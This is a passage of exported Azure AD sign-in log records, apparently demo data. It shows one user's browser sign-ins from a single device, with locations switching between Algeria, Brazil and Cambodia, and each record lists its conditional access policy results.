MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003f29b80700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a052e7e-2284-4115-9ddd-003f29b80700,SigninLogs,Sucess,28,3
+1559,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:14.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0a3fe0e-a6a9-43cb-96eb-09b9cf77565d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",82f6237a-3f5a-4c05-babd-ae7913fc0500,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,82f6237a-3f5a-4c05-babd-ae7913fc0500,SigninLogs,Sucess,-20.54751015,-47.4056282
+1560,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:27.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4120b16b-fece-40dd-abb4-561d7327be1a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c32500b0700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,7ad10e9e-8b94-4b07-9307-1c32500b0700,SigninLogs,Sucess,28,3
+1561,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1d6ec426-1ef8-457b-8cf8-efe5c84c21f0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c32640b0700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,7ad10e9e-8b94-4b07-9307-1c32640b0700,SigninLogs,Sucess,28,3
+1562,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:16.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1c4c9896-70da-455b-a366-378495cd6a7f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b125da47-83a8-4791-90e4-983bbc1a0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b125da47-83a8-4791-90e4-983bbc1a0600,SigninLogs,Sucess,13,105
+1563,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:10.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,87a0e88f-f315-4e75-a695-b09ea13c1bcd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",cbffb959-9fbe-4abe-95ed-0d85778c0800,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,cbffb959-9fbe-4abe-95ed-0d85778c0800,SigninLogs,Sucess,13,105
+1564,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aa1debbe-7f66-4eff-aa2f-f6cf7d6ffc83,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b125da47-83a8-4791-90e4-983bad130600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,b125da47-83a8-4791-90e4-983bad130600,SigninLogs,Sucess,28,3
+1565,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:34.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ad3cd38-fa26-46a1-b2b4-70651836398a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",67310a2e-a313-4902-99ba-eeb27ece0600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,67310a2e-a313-4902-99ba-eeb27ece0600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1566,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3bc55895-27c0-4069-b73c-dfe9123f9a3a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, 